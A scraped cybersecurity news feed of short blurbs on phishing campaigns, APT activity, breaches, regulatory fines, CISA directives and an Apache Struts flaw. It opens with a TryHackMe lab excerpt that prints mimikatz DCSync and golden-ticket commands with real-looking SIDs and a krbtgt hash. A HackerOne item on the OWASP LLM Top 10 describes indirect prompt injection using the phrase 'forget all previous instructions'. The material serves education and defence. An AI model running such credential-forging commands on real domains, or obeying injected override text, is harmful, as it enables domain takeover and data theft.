Exploiting Domain Trust mimikatz # privilege::debug mimikatz # lsadump::dcsync /user:za\krbtgt PS C:\> Get-ADComputer -Identity ""THMDC"" PS C:\> Get-ADGroup -Identity ""Enterprise Admins"" -Server thmrootdc.tryhackme.loc mimikatz # privilege::debug mimikatz # kerberos::golden /user:Administrator /domain:za.tryhackme.loc /sid:S-1-5-21-3885271727-2693558621-2658995185-1001 /service:krbtgt /rc4:4b6e725cc6bfc18ca1c77a1de77c5b95 /sids:S-1-5-21-3330634377-1326264276-632209373-519 /ptt C:\>dir \\thmdc.za.tryhackme.loc\c$

by HACKLIDO

Many professionals juggle multiple document formats, leading to confusion and wasted time. Imagine a streamlined process that simplifies…

by Hackread

The Cybersecurity and Infrastructure Security Agency (CISA) has issued a call to action for individuals in sensitive roles, such as senior government and political positions, to adopt encrypted communication platforms. This comes in response to espionage activities linked to People''s Republic of China (PRC) state-affiliated actors targeting telecommunications infrastructure to intercept sensitive information. CISA''s report … The post CISA Urges Public to Use Encrypted Messaging Amid Espionage Risks appeared first on CyberInsider.

by Cyber Insider

An ongoing phishing scam is abusing Google Calendar invites and Google Drawings pages to steal credentials while bypassing spam filters. [...]

by BleepingComputer

Attackers are using links to the popular Google scheduling app to lead users to pages that steal credentials, with the ultimate goal of committing financial fraud.

by Dark Reading

Pegasus spyware has been infamous for infecting the phones of journalists, activists, human rights organizations, and dissidents globally. iVerifyBasic helped me scan my phone for spyware in just 5 minutes.

by ZDNET Security

Having been at ActiveState for nearly eight years, I’ve seen many iterations of our product. However, one thing has stayed true over the years: Our commitment to the open source community and companies using open source in their code. ActiveState has been helping enterprises manage open source for over a decade. In the early days, open source was in its infancy. We focused mainly on the

by The Hacker News

Cyberattackers used fake DocuSign links and HubSpot forms to try to solicit Azure cloud logins from hundreds of thousands of employees across Europe.

by Dark Reading

The accounts pushed an anti-Qatar campaign and messages about Islamism The post Inauthentic X accounts targeted American and Canadian politicians amid student protests appeared first on DFRLab.

by DFRLab

See how the new Malware Detection feature for Barracuda Cloud-to-Cloud Backup works and how it can help you.

by Barracuda

​​Ukrainian national Mark Sokolovsky was sentenced today to five years in prison for his involvement in the Raccoon Stealer malware cybercrime operation. [...]

by BleepingComputer

Some of our customers are reporting “Threat Alerts” from Mimecast stating hackers have exploited KnowBe4 or KnowBe4 domains to send email threats.

by KnowBe4

The Russian hacking group tracked as APT29 (aka ""Midnight Blizzard"") is using a network of 193 remote desktop protocol proxy servers to perform man-in-the-middle (MiTM) attacks to steal data and credentials and to install malicious payloads. [...]

by BleepingComputer

by Dark Reading

A hack on UnitedHealth-owned tech giant Change Healthcare likely stands as one of the biggest data breaches of U.S. medical data in history. © 2024 TechCrunch. All rights reserved. For personal use only.

by TechCrunch

The Russia-linked APT29 threat actor has been observed repurposing a legitimate red teaming attack methodology as part of cyber attacks leveraging malicious Remote Desktop Protocol (RDP) configuration files. The activity, which has targeted governments and armed forces, think tanks, academic researchers, and Ukrainian entities, entails adopting a ""rogue RDP"" technique that was previously

by The Hacker News

Analysis of more than 580,000 comments shows pattern of narrative attacks amplified via coordinated behavior; additional instances appeared in Facebook comments The post How inauthentic accounts exploit Telegram comments to spread anti-Ukrainian narratives appeared first on DFRLab.

by DFRLab

San Francisco startup scores a Series B round to thwart money mule accounts, deep-fake identities, account takeovers and payment fraud. The post Bureau Raises $30M to Tackle Deepfakes, Payment Fraud appeared first on SecurityWeek.

by SecurityWeek

New details emerged about the Change Healthcare ransomware attack in Nebraska''s complaint. © 2024 TechCrunch. All rights reserved. For personal use only.

by TechCrunch

Cybersecurity researchers are warning about a new breed of investment scam that combines AI-powered video testimonials, social media malvertising, and phishing tactics to steal money and personal data.

by KnowBe4

An email phishing campaign is targeting popular YouTube creators with phony collaboration offers, according to researchers at CloudSEK. The emails contain OneDrive links designed to trick users into installing malware.

by KnowBe4

The U.S. government is considering banning TP-Link routers starting next year if ongoing investigations find that their use in cyberattacks poses a national security risk. [...]

by BleepingComputer

Across small-to-medium enterprises (SMEs) and managed service providers (MSPs), the top priority for cybersecurity leaders is to keep IT environments up and running. To guard against cyber threats and prevent data breaches, it’s vital to understand the current cybersecurity vendor landscape and continually assess the effectiveness of available solutions. Luckily, the 2024 MITRE ATT&CK

by The Hacker News

Pallet liquidation is an attractive playing field for online scammers. Will you receive goods or get your credit card details stolen?

by Malwarebytes Labs

The Dutch Data Protection Authority (Autoriteit Persoonsgegevens, AP) has fined Netflix €4.75 million for failing to adequately inform customers about the processing of their personal data between 2018 and 2020. The investigation, initiated in 2019 after complaints from the Austrian privacy group noyb (None of Your Business), revealed shortcomings in Netflix''s privacy policies and responses … The post Netflix Fined €4.75 Million by Dutch Data Protection Authority Over GDPR Violations appeared first on CyberInsider.

by Cyber Insider

KEY SUMMARY POINTS Cybersecurity researchers Dr. Web have uncovered a new and active Linux malware campaign aimed at…

by Hackread

Three months after Telegram''s controversial policy changes fueled by the arrest of its CEO, Pavel Durov, predictions of a cybercriminal migration to alternative platforms have largely fallen flat. Despite initial outrage among threat actors, Telegram remains the dominant platform for cybercrime activities, with only minor exploration of alternatives such as Signal, Discord, and others. Telegram''s … The post Telegram’s Dominance in Cybercrime Persists Despite Policy Shift appeared first on CyberInsider.

by Cyber Insider

Unit 42 researchers have uncovered an ongoing phishing campaign targeting European companies, particularly in Germany and the UK. The attacks began in June 2024 and persisted as late as September 2024. The campaign used fraudulent forms hosted on HubSpot''s Free Form Builder service to harvest credentials, enabling attackers to compromise Microsoft Azure cloud environments. Approximately … The post Threat Actors Exploit HubSpot to Harvest Microsoft Azure Credentials appeared first on CyberInsider.

by Cyber Insider

The Russian government accuses the US threat-intel firm of participating in the collection and analysis of data on the actions of the Russia''s armed forces.  The post Recorded Future Tagged as ‘Undesirable’ in Russia appeared first on SecurityWeek.

by SecurityWeek

Working closely with CISOs, chief financial officers can become key players in protecting their organizations'' critical assets and ensuring long-term financial stability.

by Dark Reading

In the cloud, security is a true balancing act. We have written about the challenge of making both on-prem and... The post How a financial leader used the power of the Sysdig platform appeared first on Sysdig.

by Sysdig

We’re officially in the final days of 2024, a year so eventful it feels difficult to remember half of what... The post Refresh yourself on 2024’s top cyber attack trends to stay safe in 2025 appeared first on Sysdig.

by Sysdig

Open-source tools like Grafana Labs and AI-driven AIOps are shaking up incident management, challenging PagerDuty and streamlining IT problem-solving and code fixes. Here''s why it matters.

by ZDNET Security

BeyondTrust has disclosed details of a critical security flaw in Privileged Remote Access (PRA) and Remote Support (RS) products that could potentially lead to the execution of arbitrary commands. Privileged Remote Access controls, manages, and audits privileged accounts and credentials, offering zero trust access to on-premises and cloud resources by internal, external, and third-party users.

by The Hacker News

INTERPOL is calling for a linguistic shift that aims to put to an end to the term ""pig butchering,"" instead advocating for the use of ""romance baiting"" to refer to online scams where victims are duped into investing in bogus cryptocurrency schemes under the pretext of a romantic relationship. ""The term ''pig butchering'' dehumanizes and shames victims of such frauds, deterring people from coming

by The Hacker News

The Russian-based attack group uses legitimate red-team tools, 200 domain names, and 34 back-end RDP servers, making it harder to identify and block malicious activity.

by Dark Reading

The cybersecurity startup''s data loss protection platform uses contextual redaction to help organizations safely use private business information across AI platforms.

by Dark Reading

Learn about autonomous SOC and how SentinelOne uses a maturity model to frame the shifts it will bring to day-to-day security operations. The post Autonomous SOC Is a Journey, Not a Destination | Introducing The Autonomous SOC Maturity Model appeared first on SentinelOne.

by SentinelOne

With AI, it''s not only the sky that''s the limit, it''s the entire universe.

by Malwarebytes Labs

For the last couple of years, a lot of attention has been placed on the evolutionary state of artificial intelligence (AI) technology and its impact on cybersecurity. In many industries, the risks associated with AI-generated attacks are still present and concerning, especially with the global average of data breach costs increasing by 10% from last […] The post Cloud Threat Landscape Report: AI-generated attacks low for the cloud appeared first on Security Intelligence.

by Security Intelligence

Over the last few months, the topic of email bombing has been brought to our attention multiple times, mostly queries from customers that go something like this:

by SpiderLabs Blog

This post first appeared on blog.netwrix.com and was written by Jonathan Blackwell.Windows PowerShell and command prompt (CMD) are both essential command-line interface tools for Windows administrators, allowing them to execute commands, manage system processes and automate administrative tasks. While CMD has been a foundational component of Windows since the MS-DOS era, PowerShell has emerged as a more advanced and powerful scripting language, enhancing system management and … Continued

by Netwrix

Network analysis reveals communities and key users, each playing distinct roles in amplifying pro-Russia and pro-China messaging The post Foreign narratives proliferate among Japanese X communities appeared first on DFRLab.

by DFRLab

Gain insight into how Dutch school district, CVO Rotterdam e.o., is taking steps to ensure they have technical solutions in place that will help them comply with the new Normenkader Funderend Onderwijs (NFO) regulations with the help of Barracuda''s security platform.

by Barracuda

The OWASP Top 10 for LLMs 2025: How GenAI Risks Are Evolving Manjesh S. Wed, 12/18/2024 - 10:16 Body Here is HackerOne’s perspective on the Top 10 list for LLM vulnerabilities, how the list has changed, and what solutions can help secure against these risks.Browse by LLM vulnerability:Prompt InjectionSensitive Information DisclosureSupply Chain VulnerabilitiesData and Model PoisoningImproper Output HandlingExcessive AgencySystem Prompt LeakageVector and Embedding WeaknessesMisinformationUnbounded ConsumptionThe OWASP Top 10 for LLMs: 2024 vs. 20252024Change2025LLM01: Prompt InjectionNo changeLLM01: Prompt InjectionLLM02: Insecure Output Handling↓3LLM02: Sensitive Information DisclosureLLM03: Training Data Poisoning↓1LLM03: Supply Chain VulnerabilitiesLLM04: Model Denial of Service✕LLM04: Data and Model PoisoningLLM05: Supply Chain Vulnerabilities↑2LLM05: Improper Output HandlingLLM06: Sensitive Information Disclosure↑4LLM06: Excessive AgencyLLM07: Insecure Plugin Design✕LLM07: System Prompt LeakageLLM08: Excessive Agency↑2LLM08: Vector and Embedding WeaknessesLLM09: Overreliance✕LLM09: MisinformationLLM10: Model Theft✕LLM10: Unbounded ConsumptionLLM01: Prompt InjectionPosition change: NoneWhat Is Prompt Injection?One of the most commonly discussed LLM vulnerabilities, Prompt Injection is a vulnerability during which an attacker manipulates the operation of a trusted LLM through crafted inputs, either directly or indirectly. For example, an attacker leverages an LLM to summarize a webpage containing a malicious and indirect prompt injection. The injection contains “forget all previous instructions” and new instructions to query private data stores, leading the LLM to disclose sensitive or private information.Solutions to Prompt InjectionSeveral actions can contribute to preventing Prompt Injection vulnerabilities, including: Enforcing privilege control on LLM access to the backend systemSegregating external content from user promptsKeeping humans in the loop for extensible functionalityLLM02: Sensitive Information DisclosurePosition change: ↑4What Is Sensitive Information Disclosure?Sensitive Information Disclosure is when LLMs inadvertently reveal confidential data. This can result in the exposing of proprietary algorithms, intellectual property, and private or personal information, leading to privacy violations and other security breaches. Sensitive Information Disclosure can be as simple as an unsuspecting legitimate user being exposed to other user data when interacting with the LLM application in a non-malicious manner. But it can also be more high-stakes, such as a user targeting a well-crafted set of prompts to bypass input filters from the LLM to cause it to reveal personally identifiable information (PII). Both scenarios are serious, and both are preventable.Why the Move? With the easy integration of LLMs into various systems (databases, internal issue trackers, files, etc.), the risk of sensitive information disclosure has increased significantly. Attackers can exploit these integrations by crafting specific prompts to extract sensitive data such as employee payrolls, Personally Identifiable Information (PII), health records, and confidential business data. Given the rapid adoption of LLMs in organizational workflows without adequate risk assessments, this issue has been elevated in importance.Solutions to Sensitive Information DisclosureTo prevent sensitive information disclosure, organizations need to:Integrate adequate data input/output sanitization and scrubbing techniquesImplement robust input validation and sanitization methodsPractice the principle of least privilege when training modelsLeverage hacker-based adversarial testing to identify possible sensitive information disclosure issues LLM03: Supply Chain VulnerabilitiesPosition change: ↑2What Are Supply Chain Vulnerabilities?The supply chain in LLMs can be vulnerable, impacting the integrity of training data, Machine Learning (ML) models, and deployment platforms. Supply Chain Vulnerabilities in LLMs can lead to biased outcomes, security breaches, and even complete system failures. Traditionally, supply chain vulnerabilities are focused on third-party software components, but within the world of LLMs, the supply chain attack surface is extended through susceptible pre-trained models, poisoned training data supplied by third parties, and insecure plugin design. Why the Move? The demand for cost-effective and performant LLMs has led to a surge in the use of open-source models and third-party packages. However, many organizations fail to adequately vet these components, leaving them vulnerable to supply chain attacks. Using unverified models, outdated or deprecated packages, or compromised training data can introduce backdoors, biases, and other security flaws. Recognizing the importance of a secure supply chain in mitigating these risks and potential legal ramifications, this vulnerability has moved up the list.Solutions to Supply Chain VulnerabilitiesSupply Chain Vulnerabilities in LLMs can be prevented and identified by:Carefully vetting data sources and suppliersUsing only reputable plug-ins, scoped appropriately to your particular implementation and use casesConducting sufficient monitoring, adversarial testing, and proper patch managementLLM04: Data and Model PoisoningPosition change: ↓1What Is Data and Model Poisoning?Training data poisoning refers to the manipulation of data or fine-tuning of processes that introduce vulnerabilities, backdoors, or biases and could compromise the model’s security, effectiveness, or ethical behavior. It’s considered an integrity attack because tampering with training data impacts the model’s ability to output correct predictions.Solutions to Data and Mode PoisoningOrganizations can prevent Training Data Poisoning by:Verifying the supply chain of training data, the legitimacy of targeted training data, and the use case for the LLM and the integrated applicationEnsuring sufficient sandboxing to prevent the model from scraping unintended data sourcesUse strict vetting or input filters for specific training data or categories of data sourcesLLM05: Improper Output HandlingPosition change: ↓3What Is Insecure Output Handling?Insecure Output Handling occurs when an LLM output is accepted without scrutiny, potentially exposing backend systems. Since LLM-generated content can be controlled by prompt input, this behavior is similar to providing users indirect access to additional functionality, such as passing LLM output directly to backend, privileged, or client-side functions. This can, in some cases, lead to severe consequences like XSS, CSRF, SSRF, privilege escalation, or remote code execution.Solutions to Improper Output HandlingThere are three key ways to prevent Insecure Output Handling:Treating the model output as any other untrusted user content and validating inputsEncoding output coming from the model back to users to mitigate undesired code interpretationsPentesting to uncover insecure outputs and identify opportunities for more secure outputLLM06: Excessive AgencyPosition change: ↑2What Is Excessive Agency?Excessive Agency is typically caused by excessive functionality, excessive permissions, and/or excessive autonomy. One or more of these factors enables damaging actions to be performed in response to unexpected or ambiguous outputs from an LLM. This takes place regardless of what is causing the LLM to malfunction — confabulation, prompt injection, poorly engineered prompts, etc. — and creates impacts across the confidentiality, integrity, and availability spectrum.Solutions to Excessive AgencyTo avoid the vulnerability of Excessive Agency, organizations should:Limit the tools, functions, and permissions to only the minimum necessary for the LLMTightly scope functions, plugins, and APIs to avoid over-functionalityRequire human approval for major and sensitive actions, leverage an audit logLLM07: System Prompt LeakagePosition change: NewWhat Is System Prompt Leakage?This new entry reflects the growing awareness of the risks associated with embedding sensitive information within system prompts. System prompts, designed to guide LLM behavior, can inadvertently leak secrets if not carefully constructed. Attackers can exploit this leaked information to facilitate further attacks.Solutions to System Prompt LeakageThere are many methods to prevent System Prompt Leakage, including:Never embed sensitive data in system promptsImplement guardrailsAvoid relying on system prompts for strict behavior controlLLM08: Vector and Embedding WeaknessesPosition change: NewWhat Is Vector and Embedding Weaknesses?LLMs rely on vector embeddings to represent and process information. Weaknesses in how these vectors are generated, stored, or retrieved can be exploited to inject harmful content, manipulate model outputs, or access sensitive data. This can lead to unauthorized access, data leakage, embedding inversion attacks, data poisoning, and behavior alteration.Solutions to Vector and Embedding WeaknessesSome key ways to prevent Vector and Embedding Weaknesses include:Implement granular access controlsImplement robust data validation pipelines for knowledge sourcesClassify data within the knowledge base to control access levels and prevent data mismatch errorsLLM09: MisinformationPosition change: NewWhat Is Misinformation?This category replaces “Overreliance” and addresses the potential for LLMs to generate and disseminate factually incorrect or misleading information. While overreliance contributes to this problem, the focus shifts to the active generation of misinformation, commonly referred to as hallucinations or confabulations.Solutions to MisinformationHere are some of the most important methods for preventing Misinformation:Always cross-check LLM outputs against trusted external sourcesBreak down complex tasks into smaller, manageable subtasks to reduce the likelihood of hallucinationsImprove output quality through fine-tuning, embedding augmentation, or other techniquesLLM10: Unbounded ConsumptionPosition change: NewWhat Is Unbounded Consumption?This new entry encompasses the risks associated with excessive resource consumption during LLM inference, including computational resources, memory, and API calls. This can lead to denial-of-service conditions, increased costs, and potential performance degradation. Model theft and Model Denial of Service, previously a separate entry, is now considered a subset of this broader category.Solutions to Unbounded ConsumptionThere are several key methods to prevent Unbounded Consumption, including:Sanitize and validate user inputs to prevent malicious or overly complex queriesImplement rate-limiting mechanisms to control the number of requests an LLM can process within a given timeframeRestrict access to LLM APIs and resources based on user roles and permissions.Train models to be resistant to adversarial inputsUse Sandbox Techniques restricting the LLM’s access to network resources, internal services, and APIsSecuring the Future of LLMsThis new release by the OWASP Foundation enables organizations looking to adopt LLM technology (or recently did so) to guard against common pitfalls. In many cases, organizations simply are unable to catch every vulnerability. HackerOne is committed to helping organizations secure their LLM applications and to staying at the forefront of security trends and challenges. HackerOne’s solutions are effective at identifying vulnerabilities and risks that stem from weak or poor LLM implementations. Conduct continuous adversarial testing through Bug Bounty, targeted hacker-based testing with Challenge, or comprehensively assess an entire application with Pentest or Code Security Audit. Contact us today to learn more about how we can help secure your LLM and secure against LLM vulnerabilities. Excerpt The new OWASP Top 10 for LLMs is here. How has it changed, and how can organizations prevent GenAI risks? Main Image

by HackerOne

Adam Griffin is still in disbelief over how quickly he was robbed of nearly $500,000 in cryptocurrencies. A scammer called using a real Google phone number to warn his Gmail account was being hacked, sent email security alerts directly from google.com, and ultimately seized control over the account by convincing him to click ""yes"" to a Google prompt on his mobile device.

by Krebs on Security

Specialized AI models provide precise, domain-specific solutions for robotics, biotech, and materials science challenges.

by Hackread

Overview The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has directed the Federal Civilian Executive Branch to implement more than 50 policies to secure Microsoft 365 environments. The new policies, Binding Operational Directive (BOD) 25-01: Implementing Secure Practices for Cloud Services, apply to Azure Active Directory/Entra ID, Microsoft Defender, Exchange Online, Power Platform, SharePoint Online and OneDrive, and Microsoft Teams. CISA has the authority to secure the more than 100 agencies that make up the FCEB, which doesn’t include Defense, National Security, and Intelligence agencies. However, CISA said it “strongly recommends all stakeholders implement these policies ... Doing so will reduce significant risk and enhance collective resilience across the cybersecurity community.” CISA plans guidance for other cloud environments next year, including Google Workspace. The new cloud security directive comes amid a flurry of activity from CISA, including a draft National Cyber Incident Response Plan, as the agency’s leadership prepares to depart next month when the new Administration takes office. Microsoft 365 Security Issues The Microsoft guidance comes after a year in which Microsoft 365 security came under heavy scrutiny. A U.S. Cyber Safety Review Board (CSRB) report earlier this year detailed “a cascade of security failures at Microsoft” that allowed China-linked threat actors in July 2023 to access “the official email accounts of many of the most senior U.S. government officials managing our country’s relationship with the People’s Republic of China.” A Congressional hearing followed, along with pledges by Microsoft to make security a top priority. Amazon recently paused a Microsoft 365 rollout after discovering security issues, according to a Bloomberg report, bringing fresh attention to the issue. CISA’s Microsoft 365 Directive CISA’s timeline gives federal civilian agencies until June 20, 2025, to “comply with a defined set of these Secure Cloud Baselines, deploy automated configuration assessment tools to check compliance, and to remediate deviations from these policies under BOD 25-01.” The first policy in the directive requires Azure AD and Entra ID implementations to block legacy protocols that don’t allow multi-factor authentication (MFA). Other Azure AD and Entra ID policies require that high-risk users and sign-ins be blocked, enforcing phishing-resistant MFA or an alternative, and setting the Authentication Methods Manage Migration feature to Migration Complete. Roughly two-thirds of the 21 policies in the Azure AD and Entra ID section involve securing privileged accounts. Defender policies call for enabling standard and strict preset security policies, protecting sensitive accounts and information, and enabling logging and alerts. Exchange policies include disabling SMTP AUTH and automatic forwarding to external domains, implementing SPF and DMARC policies, and enabling external sender warnings and mailbox auditing. Power Platform policies call for limiting trial, production, and sandbox creation to admins, creating a DLP policy to restrict connector access in the default Power Platform environment, and enabling tenant isolation. SharePoint Online and OneDrive policies include limiting external sharing and file and folder sharing, and preventing custom scripts on self-service created sites. Teams controls include limiting access for external, unmanaged, and anonymous users, blocking contact with Skype, and disabling email integration. CISA also provides assessment tools and guidance through the Secure Cloud Business Applications (SCuBA) project. Conclusion CISA has provided federal agencies with strong best practices for securing Microsoft 365 environments. These policies, based on principles of least privilege and strict authentication and access control, could also apply to other cloud environments. Cyble’s Cloud Security Posture Management (CSPM) and threat intelligence tools offer organizations automated, cost-effective cloud compliance and monitoring, with the ability to detect misconfigurations and leaks before they turn into major incidents. The post CISA Orders Federal Agencies to Secure Microsoft 365 Environments appeared first on Cyble.

by CYBLE

The U.S. has a strategic defense plan and multiple layers of defense for critical infrastructure, but significant gaps remain. This post outlines the critical and non-critical infrastructure sectors and how the U.S. secures these systems.

by Barracuda

Androxgh0st, a botnet targeting web servers since January 2024, is also deploying IoT-focused Mozi payloads, reveals CloudSEK’s latest research.

by Hackread

Technical and organizational precautions when deploying existing AI systems and developing new ones

by Kaspersky

Salt Security, a leading API security company, has announced a new product integration with CrowdStrike, combining the capabilities of the Salt Security API Protection Platform with CrowdStrike Falcon® Next-Gen SIEM. This integration, now available on the CrowdStrike Marketplace, provides customers with API-based attacker telemetry, offering a more comprehensive view of their attack surface, the companies […] The post Salt Security and CrowdStrike Extend Partnership for enhanced API Security appeared first on IT Security Guru.

by IT Security Guru

As the 2027 milestone for Business Suite 7 approaches, SAP''s extended support model offers businesses time to plan their transition.

by ITPro Today

Meta Platforms, the parent company of Facebook, Instagram, WhatsApp, and Threads, has been fined €251 million (around $263 million) for a 2018 data breach that impacted millions of users in the bloc, in what''s the latest financial hit the company has taken for flouting stringent privacy laws. The Irish Data Protection Commission (DPC) said the data breach impacted approximately 29 million

by The Hacker News

A misconfigured Amazon S3 bucket has exposed 5 million U.S. credit and debit card details, highlighting the critical need for vigilance during the holiday shopping season. The post 5 million payment card details stolen appeared first on ZENDATA Cybersecurity.

by Zendata

The personal data of hundreds of thousands of vulnerable residents is at risk after a threat group attacked a state social services database.

by Cybersecurity Dive

Sophos was also ranked the #1 solution in 36 individual reports spanning the Antivirus, EDR, Endpoint Protection Suites, XDR, Firewall, and MDR markets.

by Sophos News

Kaspersky experts analyze attacks by C.A.S, a cybergang that uses uncommon remote access Trojans and posts data about victims in public Telegram channels.

by Securelist

Meta has been fined €251M ($263M) for a 2018 data breach affecting millions in the EU, marking another penalty for violating privacy laws. The Irish Data Protection Commission (DPC) fined Meta €251 million ($263M) for a 2018 data breach impacting 29 million Facebook accounts. “The Irish Data Protection Commission (DPC) has today announced its final […]

by Security Affairs

Overview The Australian Cyber Security Center (ACSC) has alerted organizations about a severe vulnerability in the Apache Struts2 Framework. The vulnerability, CVE-2024-53677, has been identified in the Framework, posing a critical risk to organizations that use, develop, or support Java-based applications built on this widely adopted framework.  This vulnerability primarily affects versions of Apache Struts2 before 6.4.0 and can lead to severe security breaches, including remote code execution (RCE). Australian organizations using these versions must take immediate action to mitigate the risks posed by this flaw. CVE-2024-53677 is a critical file upload vulnerability in the Apache Struts2 Framework. It allows attackers to exploit path traversal flaws and manipulate file upload parameters. The flaw is found in the deprecated File Upload Interceptor component. Under certain circumstances, this can lead to the uploading of malicious files that could be executed remotely, potentially giving attackers full control over the affected system. The issue is particularly concerning for enterprise Java applications that rely on Apache Struts2. Details of Apache Struts2 Framework Vulnerability (CVE-2024-53677) According to the Apache advisory, the affected versions of Struts include Struts 2.0.0 through 2.3.37 (end-of-life versions), Struts 2.5.0 through 2.5.33, and Struts 6.0.0 through 6.3.0.2. The vulnerability has been classified as ""critical,"" with a CVSSv3 score of 9.8, reflecting its potential for exploitation.  This issue is not isolated; Apache Struts vulnerabilities have been popular targets for threat actors, with two major incidents occurring in 2017 and 2023. As such, CVE-2024-53677 must be taken seriously by organizations that continue to use older versions of Struts. Organizations using Java applications that leverage the affected versions of Apache Struts2 are at high risk of exploitation. This includes various industries such as government, telecommunications, finance, and e-commerce, where the framework remains integral to business operations. The critical nature of CVE-2024-53677 lies in its ability to facilitate remote code execution. Once an attacker successfully uploads a malicious file—often a web shell—through the vulnerable file upload mechanism, they can execute arbitrary commands, steal sensitive data, and further compromise the system. Recommendations for securing your systems Organizations are strongly advised to take the following steps to mitigate the risks associated with CVE-2024-53677: The most effective way to address the vulnerability is to upgrade to Apache Struts 6.4.0 or a later version. This version replaces the deprecated File Upload Interceptor with the more secure Action File Upload Interceptor, which significantly reduces the risk of exploitation. However, migrating to this new file upload mechanism requires modifications to the existing code, as the old File Upload Interceptor is no longer secure. If upgrading to Struts 6.4.0 is not immediately feasible, organizations should apply any available patches for affected versions of Struts. Additionally, continuous monitoring of systems for suspicious activity is crucial. Logs should be reviewed regularly for any indications of attempts to exploit the vulnerability. Organizations should audit their Java-based applications to determine whether they are using the affected versions of Apache Struts. They should also verify whether the vulnerable File Upload Interceptor component is being used. Applications that do not rely on this component are not affected by CVE-2024-53677. Given the critical nature of this vulnerability, organizations must stay updated on vendor advisories and any new patches or security releases. Apache’s security bulletins should be regularly checked to ensure that any new information or mitigation strategies are quickly applied. Conclusion  CVE-2024-53677 presents a critical risk of remote code execution (RCE), allowing attackers to exploit file upload vulnerabilities and gain unauthorized control over systems. Organizations using Struts2 versions prior to 6.4.0 must upgrade immediately and migrate to the new Action File Upload Interceptor. Prompt patching and monitoring are essential to prevent exploitation. To strengthen defenses, businesses can turn to Cyble''s AI-powered cybersecurity solutions like Cyble Vision, which offer advanced threat intelligence, dark web monitoring, and proactive risk detection. Discover how Cyble Vision can enhance your cybersecurity strategy by booking a free demo today. References: https://www.cyber.gov.au/about-us/view-all-content/alerts-and-advisories/critical-security-vulnerability-affecting-apache-struts2-below-6-4-0 The post ACSC Warns of Remote Code Execution Risk in Apache Struts2 appeared first on Cyble.

by CYBLE

The mandate to secure cloud environments is responsive to recent cybersecurity incidents, but not one specific threat, agency officials said.

by Cybersecurity Dive

Kaspersky researchers linked a new wave of cyber attacks to the cyber espionage group tracked as The Mask. Kaspersky researchers linked several targeted attacks to a cyber espionage group known as The Mask. The APT group targeted an organization in Latin America in 2019 and 2022. Threat actors accessed an MDaemon email server and used […]

by Security Affairs

A phishing campaign targeting European companies used fake forms made with HubSpot''s Free Form Builder, leading to credential harvesting and Azure account takeover. The post Effective Phishing Campaign Targeting European Companies and Organizations appeared first on Unit 42.

by Palo Alto Networks - Unit42

The Cybersecurity and Infrastructure Security Agency (CISA) and the Office of the National Cyber Director (ONCD) have jointly published a comprehensive guide aimed at embedding cybersecurity into federally funded infrastructure projects. Titled Playbook for Strengthening Cybersecurity in Federal Grant Programs for Critical Infrastructure, the guide offers essential tools and resources for grant-making agencies and recipients to incorporate strong cybersecurity practices into their programs and infrastructure initiatives. This cybersecurity playbook is designed to assist federal grant program managers, critical infrastructure owners and operators, and organizations such as state, local, tribal, and territorial governments that sub-award grant funds or oversee grant-funded projects. With the U.S. making historic investments in infrastructure through legislative acts such as the Infrastructure Investment and Jobs Act (IIJA), the Inflation Reduction Act (IRA), and the CHIPS and Science Act, this guidance emphasizes the critical need for cybersecurity to be integrated into the foundation of these projects. Key Features of the Cybersecurity Playbook The playbook provides a structured approach to incorporating cybersecurity into grant programs and offers: Recommended actions for integrating cybersecurity throughout the grant lifecycle. Model language for Notices of Funding Opportunity (NOFOs) and Terms & Conditions to ensure clear cybersecurity expectations for applicants. Templates for grant recipients to create Cyber Risk Assessments and Project Cybersecurity Plans. A comprehensive list of cybersecurity resources to support the execution of grant-funded projects securely. CISA Director Jen Easterly highlighted the significance of this guidance, stating, “As organizations take advantage of historic infrastructure grants, it’s critical to ensure the security and resilience of this next generation of American infrastructure in every community across our nation.” Harry Coker Jr., White House National Cyber Director, echoed these sentiments, emphasizing the importance of ""cybersecurity by design"" in rebuilding the nation''s critical infrastructure. He noted, “We need infrastructure projects to be shovel-ready and cyber-ready. This guidance will serve as a valuable resource to ensure cybersecurity is a fundamental part of every infrastructure project from the outset.” Minimizing Burden While Maximizing Security CISA and ONCD have designed the playbook to be flexible and to minimize administrative burden while ensuring that baseline cybersecurity practices are included in federally funded projects. Federal agencies administering grants, sub-awarding organizations, and infrastructure operators are encouraged to adopt the playbook’s recommendations to safeguard projects from evolving cyber threats. Directive to Secure Cloud Services In addition to the playbook, CISA has issued Binding Operational Directive (BOD) 25-01: Implementing Secure Practices for Cloud Services. This directive mandates federal civilian agencies to strengthen the security of cloud environments by implementing assessment tools and aligning their configurations with CISA’s Secure Cloud Business Applications (SCuBA) project. Recent cybersecurity incidents have highlighted the risks posed by cloud misconfigurations, which can enable attackers to gain unauthorized access, exfiltrate data, or disrupt services. In response, BOD 25-01 requires federal agencies to: Identify cloud tenants within their scope and report this information to CISA. Deploy SCuBA assessment tools for continuous monitoring and alignment with secure configuration baselines. Implement mandatory SCuBA policies and update configurations to address evolving threats. By June 2025, federal civilian agencies must fully implement these requirements to reduce risks associated with cloud vulnerabilities. CISA Director Jen Easterly reiterated the urgency of these measures, stating, “Malicious threat actors are increasingly targeting cloud environments and evolving their tactics. These actions are a crucial step in reducing risk to the federal civilian enterprise. We urge all organizations to adopt this guidance to collectively bolster national cyber resilience.” Strengthening Cloud Security with SCuBA The SCuBA project underpins this directive by providing consistent security baselines for widely used Software-as-a-Service (SaaS) products, such as Microsoft Office 365. These baselines are complemented by assessment tools that allow agencies to monitor their cloud environments effectively and address deviations from secure configurations. CISA emphasizes the importance of keeping security configurations updated, as outdated settings can expose systems to vulnerabilities. Regular reviews and adjustments ensure agencies remain aligned with evolving best practices and emerging cyber threats. Why This Matters The guidance and directives released by CISA and ONCD mark a significant step toward safeguarding U.S. infrastructure and federal networks against cyberattacks. As the nation invests in modernizing its critical infrastructure, integrating cybersecurity from the start will not only enhance resilience but also protect public trust in these vital systems. Federal agencies, grant recipients, and infrastructure operators are encouraged to adopt the playbook and implement the required cloud security measures promptly. These actions are crucial to ensuring that the next generation of American infrastructure is not only innovative but also secure and resilient.

by The Cyber Express

by ComputerWeekly

by ComputerWeekly

by ComputerWeekly

